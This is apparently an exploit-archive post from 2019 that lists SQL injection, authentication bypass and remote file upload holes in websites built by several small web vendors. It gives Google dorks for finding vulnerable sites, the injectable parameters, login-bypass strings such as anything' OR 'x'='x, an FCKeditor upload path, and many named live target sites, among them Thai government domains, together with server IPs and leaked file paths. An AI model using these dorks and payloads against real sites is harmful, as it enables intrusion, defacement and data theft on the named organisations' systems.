facebook facebook twitter rss

Vinayak * Royalways * Apurva Infosystems AxisCompuTech * Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn * SQL Injection / Authentication Bypass / Remote File Upload

Author: KingSkrupellos , Published: 01-02-2019
####################################################################

# Exploit Title : Vinayak * Royalways * Apurva Infosystems AxisCompuTech
* Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn *
SQL Injection / Authentication Bypass / Remote File Upload
------------------------------------------------------------------------------------------------
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/01/2019
# Vendor Homepages of Vulnerable Products :
1) vinayak.com
2) royalways.com
3) apurvainfosystems.com - axiscomputech.in
4) handsintechnology.com
5) wbprd.nic.in
6) timesmedia.co.th
7) vivadizayn.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-592 [ Authentication Bypass Issues ]

####################################################################

# There are 6 vendors that their products suffer from remote SQL Injection Vulnerabilities.
***************************************************************************

1) Designed by Vinayak SQL Injection Vulnerability

2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability

3) Designed by Apurva Infosystems SQL Injection Vulnerability

4) Powered By Hands in Technology India SQL Injection Vulnerability

5) Designed & Developed By Computerization Cell
National Informatics Centre India SQL Injection Vulnerability

6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities

7) Design - Technology VivaDizayn SQL Injection Vulnerability

####################################################################

# Google Dorks for Vulnerable Different Products :
********************************************
1) intext:designed by Vinayak site:in

2) intext:Website Design By Royalways

3) intext:designed by : Apurva Infosystems
intext:by Axis Computech & Peripherals Pvt. Ltd.

4) intext:Powered By : Hands in Technology site:in

5) intext:Designed & Developed By Computerization Cell
intext:Designed and Developed by : National Informatics Centre

6) inurl:''/select_news.php?news_id='' site:go.th

7) intext:Design - Technology VivaDizayn

####################################################################

1) Designed by Vinayak SQL Injection Vulnerability
********************************************
# Google Dork:
**************
intext:designed by Vinayak site:in

# SQL Injection Exploit :
***********************
/campusupdate.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] gnct.co.in/campusupdate.php?id=78%27

Note => (50.28.79.232) => There are 369 domains hosted on this server.

Note => (173.236.156.143) => There are 46 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_connect(): Access denied for user 'gniot_cognew
'@'localhost' (using password: YES) in /home/gnctgro7916
/gnct.co.in/campusupdate.php on line 42

####################################################################

2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
**************************************************************************
# Google Dork:
**************
intext:Website Design By Royalways

# SQL Injection Exploit :
***********************
/new_arrival.php?count=[SQL Injection]

# Admin Login Path :
*******************
/admin/

# Authentication Bypass Exploit :
*****************************
Admin username => '=''or'
Admin password => '=''or'

/admin/home.php
/admin/add_cat.php
/admin/view_cat.php
/admin/add_product.php
/admin/view_products.php
/admin/add_coupon.php
/admin/manage_coupons.php
/admin/orders_status.php?sort=New
/admin/orders_status.php?sort=Pending
/admin/orders_status.php?sort=Delivered
/admin/manage_shipping.php
/admin/manage_currency.php
/admin/view_all_users.php
/admin/chg_pwd.php

# Example Vulnerable Site :
*************************
[+] hnh.in/new_arrival.php?count=1%27

Note : (198.49.66.2) => There are 81 domains hosted on this server.

Note : (198.49.66.5) => 1 Domain.

# SQL Database Error :
**********************
Warning: mysql_num_rows() expects parameter 1 to be
resource, boolean given in /home/hnhin/public_html
/products_new_arrival.php on line 159

####################################################################

3) Designed by Apurva Infosystems SQL Injection Vulnerability
******************************************************
# Google Dork :
**************
intext:designed by : Apurva Infosystems
intext:by Axis Computech & Peripherals Pvt. Ltd.

# SQL Injection Exploit :
***********************
/index.php?id=[SQL Injection]

/laptops.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] lenovoretail.in/index.php?id=1%27

Note : (173.254.75.123) => There are 109 domains hosted on this server.

Note : (208.79.234.118) => There are 90 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_query(): Access denied for user
''@'localhost' (using password: NO) in /home
/lenovoretail/public_html/index.php on line 59

####################################################################

4) Powered By Hands in Technology SQL Injection Vulnerability
*******************************************************
# Google Dork:
**************
intext:Powered By : Hands in Technology site:in

# SQL Injection Exploit :
***********************
/our-campaigns.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] struggleforjustice.in/our-campaigns.php?id=93%27

Note : (108.167.158.159) => There are 58 domains hosted on this server.

Note : (166.62.27.182) => There are 1,024 domains hosted on this server.

# SQL Database Error :
**********************
Deprecated: mysql_query(): The mysql extension is deprecated
and will be removed in the future: use mysqli or PDO instead in /home4/x0v7q0n7
/public_html/struggleforjustice.in/our-campaigns.php on line 74

####################################################################

5) Designed & Developed By Computerization Cell
National Informatics Centre India SQL Injection Vulnerability
******************************************************
# Google Dork:
**************
intext:Designed & Developed By Computerization Cell
intext:Designed and Developed by : National Informatics Centre

# SQL Injection Exploit :
***********************
/monthlyreport/cfcpgmonthlyreport.php?district=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] wbprdgpms.in/monthlyreport/cfcpgmonthlyreport.php?district=15%27

Note : (164.100.178.145) => 2 Domains.

Note : (202.61.117.157) => 1 Domain.

# SQL Database Error :
**********************
Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource in D:\xampp\htdocs\gpmsstatus
\monthlyReport\cfcpgmonthlyreport.php on line 287

####################################################################

6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerability
****************************************************************
# Google Dork :
*****************
inurl:''/select_news.php?news_id='' site:go.th

# CopyRight © 2015 www.timesmedia.co.th All Rights Reserved

# Note : Thailand Government WebSites are vulnerable.

# Admin Control Panel Login Path :
*******************************

/login_form.php
/admin.php

# SQL Injection Exploits :
***********************

/contact.php?content_id=[SQL Injection]

/base.php?content_id=[SQL Injection]

/council.php?content_id=[SQL Injection]

/history.php?content_id=[SQL Injection]

/person.php?content_id=[SQL Injection]

/vision.php?content_id=[SQL Injection]

/memorable.php?content_id=[SQL Injection]

/council.php?content_id=[SQL Injection]

/travel.php?content_id=[SQL Injection]

/stucture.php?content_id=[SQL Injection]

/admin1.php?content_id=[SQL Injection]

/otop.php?content_id=[SQL Injection]

/news.php?id_type=[SQL Injection]

/select_news.php?news_id=[SQL Injection]

/policy.php?content_id=[SQL Injection]

/office.php?content_id=[SQL Injection]

/data.php?content_id=[SQL Injection]

/strategy_plan.php?content_id=[SQL Injection]

/activity/user_select_photo.php?news_id=[SQL Injection]

/vdo/user_select_youtube.php?yt_id=[SQL Injection]

Unauthorized Topic Add without Administrator Permission Exploit =>
***********************************************************

TARGET/webboard/new.php?category=webboard

TARGET/webboard/index.php?category=webboard

Note : Use Mozilla Firefox Open Link No Redirect
Extension to Bypass Admin Control Panel

Download and Install on your Browser =>

addons.mozilla.org/en-US/firefox/addon/noredirect/

addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/

Try to use one of the SQL Authentication Exploit Payloads below if not works =>
*******************************************************************

Admin Username : anything' OR 'x'='x

Admin Password : anything' OR 'x'='x

Directory File Path : /fileupload/....

Directory File Path : /activity/images/....

Remote File Upload Exploit =>
****************************

TARGET/admin/FCKeditor/editor/filemanager/upload/test.html

/UserFiles/....

Note : Only Thailand Government WebSites [ go.th ] are vulnerable for this issue.

# Example Vulnerable Sites :
**************************

=> Vulnerable IP Address => 61.19.250.25 =>

There are 52 domains hosted on this server.

Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php

[+] banthan.go.th/policy.php?content_id=1%27 =>

[ Proof of Concept for SQL Inj ] => archive.is/lkrrB

[+] makluakao.go.th/webboard/index.php?category=webboard =>

[ Proof of Concept ] => archive.is/azGk4

[+] phoklang.go.th/news.php?id_type=4%27 =>

[ Proof of Concept for RFU Vuln ] => archive.is/8wk57

[+] chongsammor.go.th/select_news.php?news_id=410%27

[+] dondang.go.th/base.php?content_id=7

[+] hanna-ngam.go.th/admin1.php?content_id=10%27

[+] wattananakhon.go.th/news.php?id_type=6%27

[+] klonghinpoon.go.th/vision.php?content_id=5%27

[+] nongpailomcity.go.th/data.php?content_id=1%27

[+] banphokorat.go.th/data.php?content_id=4%27

[+] buakho.go.th/history.php?content_id=4%27

[+] janaud.go.th/stucture.php?content_id=27%27

[+] waengnoiy.go.th/data.php?content_id=1%27

[+] huanong.go.th/news.php?id_type=21%27

[+] banthan.go.th/policy.php?content_id=1%27

# SQL Database Error :
*********************

Warning: mysql_fetch_array() expects parameter 1 to be
resource, boolean given in /home/phoklang/
domains/phoklang.go.th/public_html/news.php on line 129

####################################################################

7) Design - Technology VivaDizayn SQL Injection Vulnerability
*****************************************************
# Google Dork:
**************
intext:Design - Technology VivaDizayn

# SQL Injection Exploit :
**********************
/en/detay.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] rovelsan.com.tr/en/detay.php?id=696%27

Note : (185.67.122.66) => There are 210 domains hosted on this server.

# SQL Database Error :
*********************
Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource in /home/rovelsant/domains
/rovelsan.com.tr/public_html/en/detay.php on line 20

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :